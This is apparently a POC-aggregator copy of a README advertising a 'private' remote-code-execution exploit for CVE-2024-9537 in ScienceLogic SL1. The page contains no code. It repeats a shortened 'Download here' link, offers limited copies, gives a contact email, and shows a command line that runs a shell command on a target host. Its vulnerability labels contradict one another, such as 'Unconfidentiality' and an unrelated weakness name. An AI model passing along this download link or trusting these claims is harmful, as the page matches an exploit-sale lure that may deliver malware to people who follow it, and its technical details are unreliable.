POC详情: 4accfcf6e5b1e402cd2949218331ca0f090f3322

来源
关联漏洞
标题: ScienceLogic SL1 安全漏洞 (CVE-2024-9537)
描述:ScienceLogic SL1是ScienceLogic公司的一个应用程序。将您的房地产连接在一起,实现多向数据流和工作流程的自动化。 ScienceLogic SL1存在安全漏洞。攻击者利用该漏洞可以远程执行代码。
描述
Authentication Bypass Using an Alternate Path or Channel
介绍
# CVE-2024-9537-Inclusion of Functionality from Untrusted Control Sphere
# Overview
ScienceLogic SL1 (formerly EM7) is affected by an unspecified vulnerability involving an unspecified third-party component packaged with SL1.
# Exploit
## [**Download here**](https://bit.ly/40scV3G) 
## Details 
+ **CVE ID**: [CVE-2024-9537](https://nvd.nist.gov/vuln/detail/CVE-2024-9537)
+ **Published**: 10/18/2024
+ **Impact**: Unconfidentiality
+ **Exploit**: Availability: Not public, only private.
+ **CVSS**: 9.8


## Vulnerability Description
This vulnerability has a critical severity with a CVSS v3.1 base score of 9.8 and a CVSS v4.0 base score of 9.3. It can be exploited over the network without requiring user interaction or privileges. The vulnerability has high impact on confidentiality, integrity, and availability of the affected systems. Given the network attack vector and low attack complexity, this vulnerability could potentially lead to unauthorized access, data breaches, and system compromise. The vulnerability is actively being exploited in the wild and was added to the CISA Known Exploited Vulnerability list.
## Affected versions 
SL1 versions 12.1.3+, 12.2.3+, and 12.3+. Remediations have been made available for all SL1 versions back to version lines 10.1.x, 10.2.x, 11.1.x, 11.2.x, and 11.3.x.
## Running
To run exploit you need Python 3.9. Execute:
```
python CVE-2024-9537.py -h 10.10.10.10 -c 'uname -a'
```
## Contact
+ **For inquiries, please contact: hatvixprime@outlook.com**
## [**Download here**](https://bit.ly/40scV3G) (Only 4 hands)

![image](https://github.com/user-attachments/assets/6887fbb1-f099-4045-a139-aa687895d57f)
![image](https://github.com/user-attachments/assets/1a37cb12-0a1f-488b-80c6-c539d25afcee)
文件快照

[4.0K] /data/pocs/4accfcf6e5b1e402cd2949218331ca0f090f3322 └── [1.7K] README.md 0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。